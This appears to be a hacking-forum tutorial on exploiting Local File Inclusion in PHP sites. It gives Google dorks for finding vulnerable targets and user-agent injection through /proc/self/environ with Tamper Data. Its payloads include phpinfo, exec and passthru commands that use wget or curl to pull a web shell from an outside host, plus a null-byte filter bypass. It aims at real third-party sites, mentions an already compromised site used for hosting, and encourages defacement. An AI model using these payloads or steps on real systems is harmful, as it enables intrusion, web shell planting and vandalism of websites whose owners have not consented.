Hello Friends, today I'm Publishing a tutorial on what is LFI , and how to Upload Shell with Tamper Data in LFI and vulnrable website
LFI means Local File Inclusion, its gives you access to read files on a website/server via your browser.
previously i Published a Post on LFI, you can read it here
LFI vulnerable website URL looks like this:
Code:
www.website.com/index.php?page=/etc/passwd
Here's what the code looks like that makes it vulnerable.
<?phpFew Things You Need for this Method
$file = $_GET['file'];
if(isset($file))
{
include("pages/$file");
}
else
{
include("index.php");
}
?>
1. FireFox [download]
2. Tamper Data [download]
3. Vulnerable Sites [Get it here]
or use these dorks for finding vulnrable websites
inurl:index.php?homepage=
inurl:index.php?page=
inurl:index.php?index2=
Now i'm showing how to exploit LFI and upload your shell via /proc/self/environ using Tamper data
So after selecting a vulnrable website, check /etc/passwd.
Your page should come up with something that looks like this.
Full size Image : click hereGreat !!, now you are sure that website is vulnerable.
Now check for /proc/self/environ
So change your path to /proc/self/environ
Your page will look like this if the file exists,
Note - not all websites have it.
Full size image : Click here
i'm interested in, HTTP_USER_AGENT. now i'm going to change our user agent to try and get data from the site by injecting code where our browsers user agent should be.
To do this, i am going to use tamperdata. Once you have it installed, go to your options, and go to TamperData.
Now you will got a window looks like this.
your page Must still be /proc/self/environ
Click Start Tamper, and refresh your page.
i'll try some code injection.
After start tampering, you should see a window looks like this
Full size image : Click Here
In the User-Agent field, type this
<?php phpinfo();?>
Now vulnrable website is down loading,
you will see something like this if you did it correctly
Full size Image : click here
Now we can execute code, so let's upload upload your shell
Open TamperData again, click start tamper, and refresh website. and This time in the User-Agent enter this
<?exec('wget http://www.site.com/shell.txt -O shell.php');?>
It will look like this
Full size image : Click here
it downloads text file, and renames it as a php file
You can upload your shell as a text file using free webhosting...
I already shelled a website, so I am going to use that website as file hosting
when you're done with that, you can access your shell directly by going to http://site/shell.php
If you getting an error, try using the same method as when you got your
http://www.site.com/index.php?page=/etc/passwd
upload your shell by using the same method.
http://www.site.com/index.php?page=shell.php
If it loads fine the second time, you can upload a your deface using shell... checkout best deface pages here
When you are done, you have a shell, like this <3
Full size Image : Click Here
Alternate Method :
Some websites having extra precaution to prevent attacks like these.
so use this alternate method.
Change your user agent to:
<? passthru($_GET['cmd']); ?>
Now load website as
/proc/self/environ?cmd=curl http://www.site.com/shell.txt -o shell.php
your url should look like
http://www.vulnerablesite.com/index.php?page=/proc/self/environ?cmd=curlhttp://www.yoursite.com/shell.txt -o shell.php
Now hopefully your shell uploaded.
Null Bytes
Adding a , or a nullbyte sometimes filters the site, and you can get around the firewalls.
http://www.site.com/index.php?page=/etc/passwd
